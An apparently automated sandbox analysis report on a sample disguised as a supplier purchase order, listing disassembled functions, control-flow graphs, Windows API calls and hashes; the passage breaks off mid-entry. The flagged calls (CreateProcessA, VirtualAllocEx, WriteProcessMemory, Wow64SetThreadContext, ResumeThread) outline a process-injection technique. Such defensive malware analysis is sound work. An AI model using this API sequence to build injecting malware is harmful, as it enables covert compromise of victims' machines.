                                    Function 019FD4D8 Relevance: 6.1, APIs: 4, Instructions: 143threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 470 19fd4d8-19fd4e0 471 19fd49b-19fd4bf 470->471 472 19fd4e2-19fd577 GetCurrentProcess 470->472 477 19fd579-19fd57f 472->477 478 19fd580-19fd5b4 GetCurrentThread 472->478 477->478 479 19fd5bd-19fd5f1 GetCurrentProcess 478->479 480 19fd5b6-19fd5bc 478->480 482 19fd5fa-19fd615 call 19fd6b7 479->482 483 19fd5f3-19fd5f9 479->483 480->479 485 19fd61b-19fd64a GetCurrentThreadId 482->485 483->482 487 19fd64c-19fd652 485->487 488 19fd653-19fd6b5 485->488 487->488
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 019FD566
                                    • GetCurrentThread.KERNEL32 ref: 019FD5A3
                                    • GetCurrentProcess.KERNEL32 ref: 019FD5E0
                                    • GetCurrentThreadId.KERNEL32 ref: 019FD639
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 803ae5d996efe4fad682ba093393361258142b7283ffe21300bd5c748c83bd10
                                    • Instruction ID: 215abbc603dd45f9de048aeb5c5e5068f6b584af1f58d606d6462f45c90fb512
                                    • Opcode Fuzzy Hash: 803ae5d996efe4fad682ba093393361258142b7283ffe21300bd5c748c83bd10
                                    • Instruction Fuzzy Hash: 665159B09003499FDB18DFA9D548BAEBFF5FF88304F208459D109A7264D7399984CF65
                                    Function 019FD4E8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 495 19fd4e8-19fd577 GetCurrentProcess 499 19fd579-19fd57f 495->499 500 19fd580-19fd5b4 GetCurrentThread 495->500 499->500 501 19fd5bd-19fd5f1 GetCurrentProcess 500->501 502 19fd5b6-19fd5bc 500->502 504 19fd5fa-19fd615 call 19fd6b7 501->504 505 19fd5f3-19fd5f9 501->505 502->501 507 19fd61b-19fd64a GetCurrentThreadId 504->507 505->504 509 19fd64c-19fd652 507->509 510 19fd653-19fd6b5 507->510 509->510
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 019FD566
                                    • GetCurrentThread.KERNEL32 ref: 019FD5A3
                                    • GetCurrentProcess.KERNEL32 ref: 019FD5E0
                                    • GetCurrentThreadId.KERNEL32 ref: 019FD639
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: Current$ProcessThread
                                    • String ID:
                                    • API String ID: 2063062207-0
                                    • Opcode ID: 24c5ebd15a36db5371107a635aaed3d7092bf09c4563aac9fb92be2a97f3bc73
                                    • Instruction ID: b45c04279e7f8f3078c8fc1fde0a2f54663452c59fe7cd503193d6273b9633c6
                                    • Opcode Fuzzy Hash: 24c5ebd15a36db5371107a635aaed3d7092bf09c4563aac9fb92be2a97f3bc73
                                    • Instruction Fuzzy Hash: 715146B09003099FDB18DFA9D548BAEBBF5FF88314F208459E509A7364D7389984CF65
                                    Function 09454B04 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 842 9454b04-9454ba5 844 9454ba7-9454bb1 842->844 845 9454bde-9454bfe 842->845 844->845 846 9454bb3-9454bb5 844->846 852 9454c37-9454c66 845->852 853 9454c00-9454c0a 845->853 847 9454bb7-9454bc1 846->847 848 9454bd8-9454bdb 846->848 850 9454bc5-9454bd4 847->850 851 9454bc3 847->851 848->845 850->850 855 9454bd6 850->855 851->850 861 9454c9f-9454d59 CreateProcessA 852->861 862 9454c68-9454c72 852->862 853->852 854 9454c0c-9454c0e 853->854 856 9454c31-9454c34 854->856 857 9454c10-9454c1a 854->857 855->848 856->852 859 9454c1c 857->859 860 9454c1e-9454c2d 857->860 859->860 860->860 863 9454c2f 860->863 873 9454d62-9454de8 861->873 874 9454d5b-9454d61 861->874 862->861 864 9454c74-9454c76 862->864 863->856 866 9454c99-9454c9c 864->866 867 9454c78-9454c82 864->867 866->861 868 9454c84 867->868 869 9454c86-9454c95 867->869 868->869 869->869 871 9454c97 869->871 871->866 884 9454df8-9454dfc 873->884 885 9454dea-9454dee 873->885 874->873 887 9454e0c-9454e10 884->887 888 9454dfe-9454e02 884->888 885->884 886 9454df0 885->886 886->884 889 9454e20-9454e24 887->889 890 9454e12-9454e16 887->890 888->887 891 9454e04 888->891 893 9454e36-9454e3d 889->893 894 9454e26-9454e2c 889->894 890->889 892 9454e18 890->892 891->887 892->889 895 9454e54 893->895 896 9454e3f-9454e4e 893->896 894->893 898 9454e55 895->898 896->895 898->898
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09454D46
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: da75579ef7ffe3573a33ebbbea62e68657e3bf63b14c3086445a0505a2b731cb
                                    • Instruction ID: 045ca114df00fa4defa27986e9c6ff69b7f15701dd8e397d2ef4a6a33ac556bb
                                    • Opcode Fuzzy Hash: da75579ef7ffe3573a33ebbbea62e68657e3bf63b14c3086445a0505a2b731cb
                                    • Instruction Fuzzy Hash: 25A16E71D00219DFDB25CFA8C9417EEBBB2FF48310F1481AAE819AB250DB759985CF91
                                    Function 09454B10 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09454D46
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: b5810012fdd68f6addec77beea2eee85cc4bee2112eca26dda15d907b28da78a
                                    • Instruction ID: 02372992730e208b69fd7db39998bae1fb6d9d73532efc06f83945cabd1a3f57
                                    • Opcode Fuzzy Hash: b5810012fdd68f6addec77beea2eee85cc4bee2112eca26dda15d907b28da78a
                                    • Instruction Fuzzy Hash: 16915E71D00219DFDB25CFA8C9417DEBBB2FF48310F1481AAE819AB254DB749985CF91
                                    Function 019FAE38 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 019FB09E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: c4f4953ce0a2029d62f9f8c361911a780d9f164851ce3732bbd9d247a5eda0a8
                                    • Instruction ID: 2a193c143d9033e0660073bf017e690bf99d5cf5ce96759ecb5b1f88ff7d5d62
                                    • Opcode Fuzzy Hash: c4f4953ce0a2029d62f9f8c361911a780d9f164851ce3732bbd9d247a5eda0a8
                                    • Instruction Fuzzy Hash: 718155B0A00B059FD724DF29D49479ABBF5FF88300F008A2DE58ADBA90D735E945CB91
                                    Function 019F590C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 019F59C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: ffd38ffe023b9caefb9673d1c730f0563760d1223bbce3a885db6bfc49bd3d28
                                    • Instruction ID: bbc7dcfc7b5f071ae45a4fd85df9fe0a24e7a85a080f9f697520fbdd8404dd55
                                    • Opcode Fuzzy Hash: ffd38ffe023b9caefb9673d1c730f0563760d1223bbce3a885db6bfc49bd3d28
                                    • Instruction Fuzzy Hash: C641EFB1C00719CFDB24CFA9C984BDDBBB5BF48304F20816AD508AB255DB76694ACF90
                                    Function 019F44D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateActCtxA.KERNEL32(?), ref: 019F59C9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: Create
                                    • String ID:
                                    • API String ID: 2289755597-0
                                    • Opcode ID: ca86511c9a24fee457deab5ba16321e3b171eca12b66a0d3514afd34fc34bda4
                                    • Instruction ID: bf988d736eb7d182ae7a3fe15ee000374b79044df4c9102c469d00b261dbdb48
                                    • Opcode Fuzzy Hash: ca86511c9a24fee457deab5ba16321e3b171eca12b66a0d3514afd34fc34bda4
                                    • Instruction Fuzzy Hash: 9741FFB0C0071DCFDB24CFA9C984B8DBBB5BF49304F20806AD508AB255DB766949CF90
                                    Function 09454881 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09454918
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: d2a40b8e36a277c0de149379b798c6701ae669e5d42d08bdcc6f2fdfbe3e0521
                                    • Instruction ID: 6d1f1724c99b100e49bedaf649e1e99044124367b9ee6b993501e5f6eb59e4b7
                                    • Opcode Fuzzy Hash: d2a40b8e36a277c0de149379b798c6701ae669e5d42d08bdcc6f2fdfbe3e0521
                                    • Instruction Fuzzy Hash: F42126759003599FCB14DFA9C981BEEBBF1FF48310F10842AE959A7250C7789950CBA0
                                    Function 07BD0C1B Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                    Download Yara Rule
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07BD0CB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID:
                                    • API String ID: 2175133113-0
                                    • Opcode ID: cb63d0e25cd60457feb393a470c434f69772adc479a7123e3284ad9361118584
                                    • Instruction ID: e6685c61cf2a832ad3c522620759c824f25bf77e8d61f23f784571ea386b31af
                                    • Opcode Fuzzy Hash: cb63d0e25cd60457feb393a470c434f69772adc479a7123e3284ad9361118584
                                    • Instruction Fuzzy Hash: A321C0B5D002499FDB10DF9AD884ADEFBF5FB48310F18842AE919A7310D775A944CFA4
                                    Function 07BD0C20 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07BD0CB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: DrawText
                                    • String ID:
                                    • API String ID: 2175133113-0
                                    • Opcode ID: 2b5cb54fdb871feba458273ead714abc04a28608dd5762f703de9cd2b2561c01
                                    • Instruction ID: 77a42bcbdcf207b5002cf841ee2a4759da60e0115960c61112ddbe10b9bc0491
                                    • Opcode Fuzzy Hash: 2b5cb54fdb871feba458273ead714abc04a28608dd5762f703de9cd2b2561c01
                                    • Instruction Fuzzy Hash: 9121CEB5D002499FDB10DF9AD884AEEFBF5FB48320F14842AE919A7310D775A944CFA4
                                    Function 09454888 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09454918
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID:
                                    • API String ID: 3559483778-0
                                    • Opcode ID: b6ebdb05719790e3da606eb05e27b508c733681174bc7dc56e548f809be2912a
                                    • Instruction ID: 530ec91d1e74ecdc5bf46e7cae723d051de364ccab35ef8324a03ecd0cacacd2
                                    • Opcode Fuzzy Hash: b6ebdb05719790e3da606eb05e27b508c733681174bc7dc56e548f809be2912a
                                    • Instruction Fuzzy Hash: 9D2125B59003499FCB10DFAAC985BEEBBF5FF48310F10842AE919A7251D7789954CBA0
                                    Function 09454970 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 094549F8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: ee68d1f22a19db7c60cb07f6d0d6d0ee211b05362694b1fb37a575dc584f5633
                                    • Instruction ID: dfd5168a91ccd8ba50ad01ed8567ac7ec5daec6aa8bb62259a5079a50ca30703
                                    • Opcode Fuzzy Hash: ee68d1f22a19db7c60cb07f6d0d6d0ee211b05362694b1fb37a575dc584f5633
                                    • Instruction Fuzzy Hash: D22116B5C003599FCB14DFAAC981AEEBBF5FF48310F10842AE959A7251C7389940CFA0
                                    Function 094546E8 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0945476E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: 5885ee03597822fe70bbc742b00c2aec0f38b992b7d6b6bc88072ad4fda432fd
                                    • Instruction ID: 192e751df3b5fd073b1adff53ff0679d271cd1754432535a620683dca2c585d4
                                    • Opcode Fuzzy Hash: 5885ee03597822fe70bbc742b00c2aec0f38b992b7d6b6bc88072ad4fda432fd
                                    • Instruction Fuzzy Hash: C5213971D002098FDB14DFAAC4857EEBBF5EF89310F10842AD859A7251DB789985CFA1
                                    Function 07BD47D0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                    Download Yara Rule
                                    APIs
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 07BD484F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: FromMonitorPoint
                                    • String ID:
                                    • API String ID: 1566494148-0
                                    • Opcode ID: 8e286088ee130568ee7b21a06a16a9b21860708772338fd5eefdcc8e1ef34bb7
                                    • Instruction ID: 36582877e60b022780cf6c5f8ce9ef898571c3cd29aa7e7d7f400a65acaa3f92
                                    • Opcode Fuzzy Hash: 8e286088ee130568ee7b21a06a16a9b21860708772338fd5eefdcc8e1ef34bb7
                                    • Instruction Fuzzy Hash: 6D218EB49002899FDB10DFA9D4057AEFBB5FB88310F108419E955A7384C7395944CFA1
                                    Function 09454978 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                    Download Yara Rule
                                    APIs
                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 094549F8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MemoryProcessRead
                                    • String ID:
                                    • API String ID: 1726664587-0
                                    • Opcode ID: 4dc0acc1b8e2ee2462cdd9cf0ee75ebfd9d31708c109469fbb855b20a7d600e0
                                    • Instruction ID: 8f33b41e8abb7da87400534a6a84feabc2a94c505b46825e7d227cf3ff7b081f
                                    • Opcode Fuzzy Hash: 4dc0acc1b8e2ee2462cdd9cf0ee75ebfd9d31708c109469fbb855b20a7d600e0
                                    • Instruction Fuzzy Hash: 442125B1C002499FCB10DFAAC981AEEBBF5FF48310F10842AE919A7250C7389940CBA1
                                    Function 094546F0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0945476E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID:
                                    • API String ID: 983334009-0
                                    • Opcode ID: a33e30905045de1d07bef3401c169fa72ff095ba061d231b3bcdd5a4530b3424
                                    • Instruction ID: d8f03d150160afdd687eeb819e5ee841571051c26f63c0a7218971d435e964b4
                                    • Opcode Fuzzy Hash: a33e30905045de1d07bef3401c169fa72ff095ba061d231b3bcdd5a4530b3424
                                    • Instruction Fuzzy Hash: 2E213871D002098FDB10DFAAC4857AEBBF5EF49320F10842AD819A7251DB789984CFA0
                                    Function 07BD47C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 07BD484F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2174817374.0000000007BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: FromMonitorPoint
                                    • String ID:
                                    • API String ID: 1566494148-0
                                    • Opcode ID: f205871fe5d04ce52d586a51e77724c05ed469c30f2beaba5ccdbd3069db1be4
                                    • Instruction ID: 1ad7ba24e336b703aefbae2902544518a12ca3659837dac98d83b74764c7651b
                                    • Opcode Fuzzy Hash: f205871fe5d04ce52d586a51e77724c05ed469c30f2beaba5ccdbd3069db1be4
                                    • Instruction Fuzzy Hash: 262159B5D002899FDB10DFA9D405BEEBBF5FB48714F108419D855AB380D339AA44CFA1
                                    Function 019FD730 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019FD7B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: c65e54242926d524b50bef617865893a660a28d78aae40c34172db7ae03043dd
                                    • Instruction ID: 0b6280163367fd4a7f2ed6544c29dc81b24a61aa3d9fd40b32915f9f1d51910c
                                    • Opcode Fuzzy Hash: c65e54242926d524b50bef617865893a660a28d78aae40c34172db7ae03043dd
                                    • Instruction Fuzzy Hash: BE21C4B5900248AFDB10CF9AD984ADEFFF9FB48310F14841AE918A7350D378A954CFA5
                                    Function 019FD728 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 019FD7B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: DuplicateHandle
                                    • String ID:
                                    • API String ID: 3793708945-0
                                    • Opcode ID: 333a2d6bee5e4200dbb47b0c9017ce25803095b74c222634c330ee9343ed49c5
                                    • Instruction ID: e4f5b2d0252194641f68695eaafdbd875805a91d779205dbcb2d15ac668b9f67
                                    • Opcode Fuzzy Hash: 333a2d6bee5e4200dbb47b0c9017ce25803095b74c222634c330ee9343ed49c5
                                    • Instruction Fuzzy Hash: B621E4B5900248DFDB10CF99D585ADEFBF5FB48310F14841AE918A7310C378A944CFA0
                                    Function 094547C1 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09454836
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 19f68e0972f44169d7c0115fa4c6d830d460b8dcbcf3e955aefde88420212776
                                    • Instruction ID: 0ce72b0623916aadbcb778c7d30a5e0e8ec154f10744409da9529196beb34121
                                    • Opcode Fuzzy Hash: 19f68e0972f44169d7c0115fa4c6d830d460b8dcbcf3e955aefde88420212776
                                    • Instruction Fuzzy Hash: 671129759002499FCB24DFA9C8456EFBFF5FF88310F14841AE95AA7260C7399551CFA0
                                    Function 094547C8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09454836
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: 9a3e532967575786f05d7677157af7da409c5cd430b2a19b61aaff43d15db9c1
                                    • Instruction ID: d212167dcfcbf9a44d01f7931c5f13b30e730b8c3608506734ff32941b5d4d76
                                    • Opcode Fuzzy Hash: 9a3e532967575786f05d7677157af7da409c5cd430b2a19b61aaff43d15db9c1
                                    • Instruction Fuzzy Hash: 45114975C002499FCB20DFAAC845AEFBFF5EF88320F10841AE919A7250C779A540CFA0
                                    Function 09454200 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 218e056d25d1beb727fb5c0dca09da97e55c46af0a8c454ef0559a6bee842be8
                                    • Instruction ID: 45ab3171146f32fc32fcb030390533f71589176d41223d6c5d590d352aa8d5aa
                                    • Opcode Fuzzy Hash: 218e056d25d1beb727fb5c0dca09da97e55c46af0a8c454ef0559a6bee842be8
                                    • Instruction Fuzzy Hash: AC112BB1D002488ECB24DFAAC4457EFFBF5EF88314F20841AD55AA7250CB795944CFA4
                                    Function 09454208 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID:
                                    • API String ID: 947044025-0
                                    • Opcode ID: 29347ff51676ff1fbf9e30ad427fdc4673563e3019ef2b85f01cb118e29c4967
                                    • Instruction ID: 4fd9e096070449392ee3615b2b664bcf9f7401103af53eb617d2676f200b602d
                                    • Opcode Fuzzy Hash: 29347ff51676ff1fbf9e30ad427fdc4673563e3019ef2b85f01cb118e29c4967
                                    • Instruction Fuzzy Hash: 241128B1D002488BCB20DFAAC8457AEFBF5EF88320F20841AD519A7250CB79A544CFA5
                                    Function 019FB038 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 019FB09E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2161190963.00000000019F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 019F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_19f0000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: HandleModule
                                    • String ID:
                                    • API String ID: 4139908857-0
                                    • Opcode ID: b0cea3a2d5bfafe428c6c84b349dfca313e98118469445d8248b2223c535ecd9
                                    • Instruction ID: 5557a966f42102a760b562f7e15db9b9bea29dcaee85831069105797ff1e70f7
                                    • Opcode Fuzzy Hash: b0cea3a2d5bfafe428c6c84b349dfca313e98118469445d8248b2223c535ecd9
                                    • Instruction Fuzzy Hash: 991102B5C002498FDB20DF9AC444B9EFBF8AB88310F14841AD929A7200D379A545CFA5
                                    Function 09458DF0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 09458E55
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
                                    • API String ID: 410705778-0
                                    • Opcode ID: 208439989a67e7c734cb3e6d9a8a45e03374f5781defeb647bf63b5749824d7c
                                    • Instruction ID: b90ed4d1eb6ceaf7769d6084ae0123284ef99bda170c0a4c70ac06af8860ce97
                                    • Opcode Fuzzy Hash: 208439989a67e7c734cb3e6d9a8a45e03374f5781defeb647bf63b5749824d7c
                                    • Instruction Fuzzy Hash: 8C11E3B58003499FDB20DF99D885BEEBFF8FB48310F10845AE959A7211C379A544CFA1
                                    Function 09458764 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 09458E55
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2175534630.0000000009450000.00000040.00000800.00020000.00000000.sdmp, Offset: 09450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9450000_Supplier Purchase Order - PO0002491.jbxd
                                    Similarity
                                    • API ID: MessagePost
                                    • String ID:
